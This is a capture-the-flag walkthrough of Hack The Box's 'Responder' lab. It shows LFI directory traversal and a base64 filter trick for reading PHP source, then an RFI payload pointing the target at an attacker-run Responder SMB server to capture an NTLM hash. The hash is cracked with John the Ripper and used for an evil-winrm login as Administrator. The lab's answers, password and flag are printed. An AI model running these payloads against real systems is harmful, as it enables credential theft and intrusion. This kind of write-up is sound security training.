Hack The Box Starting Point: Responder
Responder is a machine located in Hack The Box's Starting Point Tier 1. It provides a walkthrough on capturing NTLM hashes when the machine attempts to authenticate with a deceptive malicious SMB server that we will be setting up. This room offers valuable insights and learning opportunities on local file inclusion(LFI).
Project information
- Title: Responder
- Organizer: Hack The Box
- Project date: June, 2023
- URL: www.hackthebox.com
To obtain the VPN profile for connecting to Hack The Box, please follow these steps:
- Click on the "HTB" button located in the top right corner.
- From the options, select "Starting Point".
- Choose "OpenVPN" and click on it.
- Finally, click on the "Download VPN" button to acquire the VPN profile.
To connect to HTB, for Windows users, download and install OpenVPN Connect and load the VPN profile into the application. Linux users can connect by opening a Terminal and entering the provided command below. Please allow a few minutes for the HTB website to acknowledge the connection.
Begin by initiating a connection to the Starting Point VPN.
sudo openvpn [filename].ovpn
Launch a new tab on your Kali Linux terminal while keeping the current tab connected to your lab session.
Click the green "Spawn Machine" button to start the target machine's spawning process. Remember that the IP address for the target machine is 10.129.174.147. However, use the IP address you have received, as it may differ from the provided one.
Task 1 : When visiting the web service using the IP address, what is the domain that we are being redirected to?
Answer: unika.htb
At this time, we will proceed with conducting a standard Nmap scan.
nmap -sS -p- -sV -sC 10.129.196.141
To address the issue of the website being inaccessible, we can modify the host file by executing the following command.
echo "10.129.196.141 unika.htb" | sudo tee -a /etc/hosts
An alternative method to modify the hosts file is by manually visiting the location /etc/hosts and adding the entry directly.
After including the entry in the hosts file, the website became accessible.
Task 2: Which scripting language is being used on the server to generate webpages?
You can identify the scripting language used on a server to generate webpages by using either the Wappalyzer browser extension or the Nikto command-line tool. Wappalyzer analyzes webpage elements, while Nikto focuses on web server scanning and vulnerability assessment.
Answer: php
TASK 3: What is the name of the URL parameter which is used to load different language versions of the webpage?
When we change the language to German, we can observe that the parameter used is 'page'. Page serves as the query parameter, and we can provide the language as its value.
Answer: page
TASK 4: Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
The scenario presents different examples as questions, but it is evident from the answer field that the correct response is Local File Inclusion. This vulnerability involves including a local file on the system that should not be accessible.
Answer: ../../../../../../../../windows/system32/drivers/etc/hosts
To delve deeper into the topic, let's conduct a Google search to gather additional information.
Based on the information obtained from Wappalyzer, we can identify that the server is running Apache. While exploring, I came across an intriguing website. However, I have decided to utilize the solution provided for Task 4, as it involves finding a file that should exist on the system.
Since it works, we could attempt to perform directory traversal by removing this part of the URL and exploring further.
After a successful previous attempt, an opportunity arises to employ this technique for reading PHP files that are typically restricted to server-side access. To further explore this, experimenting with implementing a filter can be fruitful. In my research, I discovered a valuable website, which suggests using the filter value
convert.base64-encode/resource=index.php. By applying this filter to the web address, the base64-encoded code was obtained.
To reveal the original PHP code, one can utilize the command
echo <base64 code> | base64 -d. This command decodes the base64-encoded content, enabling the viewer to observe the PHP code in its original form.
Task 5: Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer: //10.10.14.6/somefile
Task 6: What does NTLM stand for?
Answer: New Technology Lan Manager
We are now approaching the objective of the box, which is to utilize the Responder utility. Further details on Responder available here.
Task 7: Which flag do we use in the Responder utility to specify the network interface?
Answer: -I
Task 8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?
Answer: John The Ripper
Task 9: What is the password for the administrator user?
To find the answer, we can initiate the Responder utility by executing the following command:
responder -I tun0
Executing this command will configure multiple servers, attempting connections to a range of targets. However, it's important to note that not all servers may be accessible due to permissions and other factors on the victim's system.
Next, we will proceed to run the following URL in the browser :
"unika.htb/index.php?page=//<Responder_IP>/somefile", replacing <Responder_IP> with your Responder machine's IP address.
Subsequently, the Responder utility will display the hash output
After making a copy of the obtained hash and creating a new file, we can employ John the Ripper to crack the password by providing it with a wordlist.
Answer: badminton
Task 10: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Answer: 5985
Submit root flag
To retrieve the root flag, we can utilize the following command:
evil-winrm -i 10.129.196.141 -u Administrator -p badminton
As we are currently connected to a PowerShell session, we can utilize commands like `cd..` to navigate through the directory structure and search for the root flag.
Ultimately, I managed to find and access the root flag, effectively compromising the Responder box.
Flag : ea81b7afddd03efaa0945333ed147fac
